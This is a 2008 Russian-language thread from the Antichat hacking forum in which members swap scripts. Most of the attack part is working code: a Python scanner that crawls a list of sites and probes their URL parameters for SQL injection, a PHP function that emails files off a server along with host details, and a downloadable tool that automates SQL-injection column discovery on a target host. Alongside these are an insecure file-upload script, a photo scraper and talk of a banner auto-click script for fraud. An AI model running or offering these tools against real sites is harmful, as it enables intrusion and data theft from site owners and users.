Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.09.2008, 07:14
|
|
Познающий
Регистрация: 10.11.2007
Сообщений: 36
Провел на форуме:
198117
Репутация:
5
|
|
Сообщение от .::BARS::.
не понятно... пример кинь если можешь... или подробней расскажи!? ты зашел на сайт, а там реклама и что дальше?
Вот я зашел в эту тему! И был скрипт!
"Вот вылаживаю скрипт, думаю пригоидться многим ко зарабатывает на кликах т.е. баннерах, когда кто-то входит на сайт он автоматически кликает на баннер т.е."
Этот код внедрять в index.php надо!
(млин сложно обьяснить я процитировал что человек говорил, он отписывался в этой теме).
|
|
|
08.09.2008, 01:37
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Может кому-то будет нужен 
Скрипт на перле качает фотки с xuk.ru
Код:
#Скрипт закачивает фотки с xuk.ru ;)
use LWP;
use strict;
my $n = shift;
my $html = '';
if(defined($n))
{
$html = "$n.html";
$n = " - $n";
}
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst)=localtime(time);
my $newdir = sprintf "%02u-%02u-%04u$n",$mday,$mon+1,$year+1900;
mkdir $newdir || die 'cannot create directory';
chdir $newdir;
my $ua = LWP::UserAgent->new;
my $res = $ua->get("http://xuk.ru/$html");
die 'cannot connect' unless $res->is_success;
my @main = split /\x0D\x0A/, $res->content;
my @girl_url;
foreach (@main)
{
if(/vid-1\.html/)
{
push @girl_url, $& if /http:\/\/xuk\.ru\/.*vid-1\.html/;
}
}
foreach (@girl_url)
{
my $folder = substr $&, 1, -11 if /\/[\w-]*\/vid-1.html/;
print "FOLDER: $folder\n";
mkdir $folder || die 'cannot create directory';
$res = $ua->get($_);
unless($res->is_success)
{
warn "cannot connect\n";
next
}
my @vid = split /\x0D\x0A/, $res->content;
my @foto_url;
foreach(@vid)
{
if(/<img alt="Эротика/)
{
push @foto_url, $& if /http:\/\/pic\.xuk\.ru\/files.*\.jpg/;
}
}
foreach (@foto_url)
{
my $filename = substr $&, 1 if /\/[\w-\(\)\.]*\.jpg/;
print "\tFILE: $filename\n";
$ua->get($_, ':content_file' => "$folder/$filename");
}
}
chdir '..';
|
|
|
|
08.09.2008, 17:43
|
|
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198
Репутация:
341
|
|
Может у кого есть скрипт,который будет заливать файл с компьютера на хост, чтобы после закачки выдавал ссылку на закачанный файл, только ссылку зашифрованную
www.site.ru/music/sd5f4gs6d5f4g56/
и чтобы можно было заливать файл в разные папки на хосте, ну просто выбираешь категорию файла, например музыка и закачиваешь и файл закачивается в site.ru/music/ или выбираешь категорию programm то закачивается в site.ru/programm/
Вообщем тут сделал не большую картинку для наглядного примера:
Последний раз редактировалось [Dezzter]; 08.09.2008 в 17:46..
|
|
|
|
09.09.2008, 05:41
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от [Dezzter]
Может у кого есть скрипт,который будет заливать файл с компьютера на хост, чтобы после закачки выдавал ссылку на закачанный файл, только ссылку зашифрованную
и чтобы можно было заливать файл в разные папки на хосте, ну просто выбираешь категорию файла, например музыка и закачиваешь и файл закачивается в site.ru/music/ или выбираешь категорию programm то закачивается в site.ru/programm/
Вообщем тут сделал не большую картинку для наглядного примера:
Обычный скрипт для загрузки изоражений напиши,а шифровку сделай через Base64,все будет намного проще!Тем более там всего лишь картинки,прятать нечего =)
|
|
|
|
12.09.2008, 11:09
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
загрузчик изображений...
PHP код:
<? $dir1="./musik/"; $dir2="./film/";
$dir3="./123/"; ?> <FORM ENCTYPE='multipart/form-data' METHOD=POST>
файл: <INPUT NAME='front' TYPE='file'>
<select name="dir" size="1">
<option value="<? echo $dir1; ?>">Музыка </option>
<option value="<? echo $dir2; ?>">Фильмы </option>
<option value="<? echo $dir3; ?>">И т.д. </option>
</select> <INPUT TYPE='submit'>
</FORM>
<?php $tmp_name="tmp.jpg";
if(isset($_FILES['front']['name']))
{
$tmpName = $_FILES['front']['tmp_name'];
$name = base64_encode($front);
$n=str_replace("=","",$name);
$newName = $dir.$n.".jpg";
if(!is_uploaded_file($tmpName) || !move_uploaded_file($tmpName, $newName))
{ echo "error";
}
} ?>
будут вопросы пиши, прокоментирую, что к чему... |
|
|
|
13.09.2008, 21:00
|
|
Участник форума
Регистрация: 25.08.2007
Сообщений: 114
Провел на форуме:
485754
Репутация:
23
|
|
Есть у кого сканер на sql инъекции?
|
|
|
|
13.09.2008, 23:15
|
|
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701
Репутация:
811
|
|
Код:
#!/usr/bin/python
from sgmllib import SGMLParser
import sys, urllib, re, urllib2, sets
class URLLister(SGMLParser):
def reset(self):
SGMLParser.reset(self)
self.urls = []
def start_a(self, attrs):
href = [v for k, v in attrs if k=='href']
if href:
self.urls.extend(href)
def test(host):
source = urllib2.urlopen(host+sys.argv[2]).read()
if re.search("Warning", source) != None:
print "\n\t[!] SQL:",host+sys.argv[2]
if re.search("mysql_fetch_array()", source) != None:
print "\t[!] Found: mysql_fetch_array() error\n"
if re.search("You have an error in your SQL syntax", source) != None:
print "\t[!] Found: sql syntax error\n"
print "\n\t SQLtest v1.2"
print "\t--------------------------------------------\n"
if len(sys.argv) != 3:
print "Usage : ./sqltest.py <list of sites> <payload (-1, 999999)>"
print "Eg: ./sqltest.py sites.txt \"-1\"\n"
sys.exit(1)
try:
sites = open(sys.argv[1], "r").readlines()
except(IOError):
print "Error: Check your site list path\n"
sys.exit(1)
print "[+] Loaded:",len(sites),"sites"
print "[+] Payload:",sys.argv[2]
for site in sites:
site = site.replace("\n","")
if site.find("http://") != -1:
site = site.replace("http://","")
site = "http://"+site.rsplit("/",1)[0]
if site.find("https://") != -1:
site = site.replace("https://","")
site = "https://"+site.rsplit("/",1)[0]
print "\n[+] Collecting:",site
try:
usock = urllib.urlopen(site)
parser = URLLister()
parser.feed(usock.read())
parser.close()
usock.close()
if len(parser.urls) >=1:
urls2 = []
for url in parser.urls:
if url.find("://") == -1:
if url[0] == "/":
url = site+url
else:
url = site+"/"+url
if url.count("=") >= 2:
for x in xrange(url.count("=")):
urls2.append(url.rsplit("=",x+1)[0]+"=")
if url.find("=") != -1:
if url[0] == "/":
urls2.append(site+url.split("=",1)[0]+"=")
else:
urls2.append(url.split("=",1)[0]+"=")
urls2 = list(sets.Set(urls2))
print "[+] Links Found:",len(urls2),"\n"
else:
urls2 = []
print "[-] Error Connecting"
for url in urls2:
print "[+] Testing:",url+sys.argv[2]
try:
test(url)
except:
pass
except:
pass
print "\n[-] Done\n"
попробуй |
|
|
|
14.09.2008, 04:13
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
2GumaNoiD
http://forum.antichat.ru/showpost.php?p=853130&postcount=15
|
|
|
|
15.09.2008, 15:06
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
вот нашел у себя на винте, думаю кому нить полезно будет посмотреть...
функция по отправке файла с сервера себе на мыло...
PHP код:
function download_mail($dir,$file) {
$demail="Ваше@мыло.ру";
$buf = explode(".", $file);
$dir = str_replace("\\","/",$dir);
$fullpath = $dir."/".$file;
$size = tinhbyte(filesize($fullpath));
$fp = fopen($fullpath, "rb");
while(!feof($fp))
$attachment .= fread($fp, 4096);
$attachment = base64_encode($attachment);
$subject = "тема сообщения ($file)";
$boundary = uniqid("NextPart_");
$headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
$info = "---==== Сообщение от ($demail)====---\n\n";
$info .= "IP:\t$REMOTE_ADDR\n";
$info .= "HOST:\t$HTTP_HOST\n";
$info .= "URL:\t$HTTP_REFERER\n";
$info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
$info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
$send_to = "$demail";
$send = mail($send_to, $subject, $info, $headers);
if($send == 2)
echo "<br>
<center>
Спасибо!!!Файл <b>$file</b> отправлен вам на <u>$demail</u>.</center><br>";
fclose($fp);
}
использавать так:
download_mail($dir,$file);
где $dir это директория на серваке, а $file файл который вы хотите отправить...
Последний раз редактировалось winstrool; 15.09.2008 в 15:11..
|
|
|
|
16.09.2008, 02:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
MySQL_column
Программа MySQL_column предназначена для автоматизации процесса узнавания кол-ва колонок при потенциальной sql-inj
В комплекте 4 файла:
1. mysql_column.exe - сама программа
2. source_url.txt - файл инициализации URL, при котором можно получить SQL-inject (вам лишь следует скопировать нужный URL в этот файл и заменить вашу {sql} на "№"). Например здесь есть sql: http://www.sait.ru/index.php?id=5+union+select+1/*, значит в файл пишем: http://www.sait.ru/index.php?id=5№
3. source_filtr.txt - файл инициализации фильтра (/*,-- или просто пусто). В данном случае "/*"
4. source_host.txt - файл инициализации взламываемого хоста. Если посмотреть выше - то www.sait.ru
5. После того, как вы занесли заполнили эти два файла (обязательное условие для корректной работы программы), можете запускать саму программу mysql_column.exe. Она автоматически выяснит и сохранит без вашего участия в файл output.txt следующие параметры:
1) Правильное кол-во колонок
2) Номер принтабельной колонки
3) Валидный урл для получения информации при sql-inj
Example: http://www.site.org/index.php?id=5+union+select+1,2,3?????????????/*
source_url.tx: "http://www.site.org/index.php?id=5№"
source_host.txt: "www.site.org"
source_filtr.txt: "/*"
(c)Pashkela
скачать здесь:
http://pashkela.narod.ru/progi/MySQL_column.rar
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Dezzter]](/avatars/avatar45529.jpg?853787){kind=avatar}
Линейный вид
